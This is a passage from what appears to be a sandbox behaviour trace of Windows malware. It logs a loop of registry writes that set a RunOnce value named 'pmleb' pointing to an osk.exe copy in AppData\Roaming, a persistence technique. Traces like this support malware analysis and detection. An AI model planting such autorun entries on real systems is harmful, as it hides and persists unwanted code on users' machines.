lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.567] RegCloseKey (hKey=0x280) returned 0x0 [0099.567] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.567] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.567] SetTimer (hWnd=0x20280, nIDEvent=0x2328, uElapse=0xa, lpTimerFunc=0x0) returned 0x2328 [0099.567] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.580] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.580] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.581] KillTimer (hWnd=0x20280, uIDEvent=0x2328) returned 1 [0099.581] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.581] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.581] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.582] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.582] RegCloseKey (hKey=0x280) returned 0x0 [0099.582] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.582] SetTimer (hWnd=0x20280, nIDEvent=0x2329, uElapse=0xa, lpTimerFunc=0x0) returned 0x2329 [0099.582] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.612] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.612] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.612] KillTimer (hWnd=0x20280, uIDEvent=0x2329) returned 1 [0099.612] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.613] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.613] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.613] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.613] RegCloseKey (hKey=0x280) returned 0x0 [0099.613] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.614] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.614] SetTimer (hWnd=0x20280, nIDEvent=0x232a, uElapse=0xa, lpTimerFunc=0x0) returned 0x232a [0099.614] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.627] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.627] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.627] KillTimer (hWnd=0x20280, uIDEvent=0x232a) returned 1 [0099.628] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.628] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.628] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.628] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.628] RegCloseKey (hKey=0x280) returned 0x0 [0099.628] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.629] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.629] SetTimer (hWnd=0x20280, nIDEvent=0x232b, uElapse=0xa, lpTimerFunc=0x0) returned 0x232b [0099.629] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.644] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.644] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.645] KillTimer (hWnd=0x20280, uIDEvent=0x232b) returned 1 [0099.645] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.645] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.645] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.646] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.646] RegCloseKey (hKey=0x280) returned 0x0 [0099.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.646] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.646] SetTimer (hWnd=0x20280, nIDEvent=0x232c, uElapse=0xa, lpTimerFunc=0x0) returned 0x232c [0099.646] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.658] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.658] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.659] KillTimer (hWnd=0x20280, uIDEvent=0x232c) returned 1 [0099.659] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.659] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.659] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.659] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.660] RegCloseKey (hKey=0x280) returned 0x0 [0099.660] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.660] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.660] SetTimer (hWnd=0x20280, nIDEvent=0x232d, uElapse=0xa, lpTimerFunc=0x0) returned 0x232d [0099.660] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.674] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.674] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.674] KillTimer (hWnd=0x20280, uIDEvent=0x232d) returned 1 [0099.674] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.675] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.675] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.675] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.675] RegCloseKey (hKey=0x280) returned 0x0 [0099.675] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.675] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.676] SetTimer (hWnd=0x20280, nIDEvent=0x232e, uElapse=0xa, lpTimerFunc=0x0) returned 0x232e [0099.676] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.689] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.689] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.690] KillTimer (hWnd=0x20280, uIDEvent=0x232e) returned 1 [0099.690] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.690] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.690] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.691] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.691] RegCloseKey (hKey=0x280) returned 0x0 [0099.691] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.691] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.691] SetTimer (hWnd=0x20280, nIDEvent=0x232f, uElapse=0xa, lpTimerFunc=0x0) returned 0x232f [0099.691] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.706] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.706] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.706] KillTimer (hWnd=0x20280, uIDEvent=0x232f) returned 1 [0099.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.707] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.707] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.707] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.708] RegCloseKey (hKey=0x280) returned 0x0 [0099.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.708] SetTimer (hWnd=0x20280, nIDEvent=0x2330, uElapse=0xa, lpTimerFunc=0x0) returned 0x2330 [0099.708] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.721] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.721] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.721] KillTimer (hWnd=0x20280, uIDEvent=0x2330) returned 1 [0099.721] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.722] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.722] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.722] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.722] RegCloseKey (hKey=0x280) returned 0x0 [0099.722] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.723] SetTimer (hWnd=0x20280, nIDEvent=0x2331, uElapse=0xa, lpTimerFunc=0x0) returned 0x2331 [0099.723] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.736] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.736] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.736] KillTimer (hWnd=0x20280, uIDEvent=0x2331) returned 1 [0099.737] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.737] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.737] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.738] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.738] RegCloseKey (hKey=0x280) returned 0x0 [0099.738] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.738] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.738] SetTimer (hWnd=0x20280, nIDEvent=0x2332, uElapse=0xa, lpTimerFunc=0x0) returned 0x2332 [0099.738] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.752] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.752] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.752] KillTimer (hWnd=0x20280, uIDEvent=0x2332) returned 1 [0099.753] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.753] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.753] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.753] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.754] RegCloseKey (hKey=0x280) returned 0x0 [0099.754] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.754] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.754] SetTimer (hWnd=0x20280, nIDEvent=0x2333, uElapse=0xa, lpTimerFunc=0x0) returned 0x2333 [0099.754] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.768] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.768] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.770] KillTimer (hWnd=0x20280, uIDEvent=0x2333) returned 1 [0099.771] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.772] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.772] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.772] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.772] RegCloseKey (hKey=0x280) returned 0x0 [0099.772] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.773] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.773] SetTimer (hWnd=0x20280, nIDEvent=0x2334, uElapse=0xa, lpTimerFunc=0x0) returned 0x2334 [0099.773] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.783] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.783] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.783] KillTimer (hWnd=0x20280, uIDEvent=0x2334) returned 1 [0099.784] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.784] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.784] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.784] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.785] RegCloseKey (hKey=0x280) returned 0x0 [0099.785] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.785] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.785] SetTimer (hWnd=0x20280, nIDEvent=0x2335, uElapse=0xa, lpTimerFunc=0x0) returned 0x2335 [0099.785] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.799] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.799] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.799] KillTimer (hWnd=0x20280, uIDEvent=0x2335) returned 1 [0099.799] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.800] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.800] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.800] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.800] RegCloseKey (hKey=0x280) returned 0x0 [0099.801] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.801] SetTimer (hWnd=0x20280, nIDEvent=0x2336, uElapse=0xa, lpTimerFunc=0x0) returned 0x2336 [0099.801] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.845] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.845] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.846] KillTimer (hWnd=0x20280, uIDEvent=0x2336) returned 1 [0099.850] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.850] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.850] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.851] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.851] RegCloseKey (hKey=0x280) returned 0x0 [0099.851] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.851] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.851] SetTimer (hWnd=0x20280, nIDEvent=0x2337, uElapse=0xa, lpTimerFunc=0x0) returned 0x2337 [0099.851] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.861] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.861] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.861] KillTimer (hWnd=0x20280, uIDEvent=0x2337) returned 1 [0099.862] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.862] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.862] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.862] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.863] RegCloseKey (hKey=0x280) returned 0x0 [0099.863] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.863] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.863] SetTimer (hWnd=0x20280, nIDEvent=0x2338, uElapse=0xa, lpTimerFunc=0x0) returned 0x2338 [0099.863] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.877] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.877] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.877] KillTimer (hWnd=0x20280, uIDEvent=0x2338) returned 1 [0099.877] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.878] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.878] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.878] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.878] RegCloseKey (hKey=0x280) returned 0x0 [0099.878] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.878] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.878] SetTimer (hWnd=0x20280, nIDEvent=0x2339, uElapse=0xa, lpTimerFunc=0x0) returned 0x2339 [0099.878] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.895] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.895] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.895] KillTimer (hWnd=0x20280, uIDEvent=0x2339) returned 1 [0099.896] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.896] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.896] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.896] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.896] RegCloseKey (hKey=0x280) returned 0x0 [0099.897] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.897] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.897] SetTimer (hWnd=0x20280, nIDEvent=0x233a, uElapse=0xa, lpTimerFunc=0x0) returned 0x233a [0099.897] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.908] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.908] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.908] KillTimer (hWnd=0x20280, 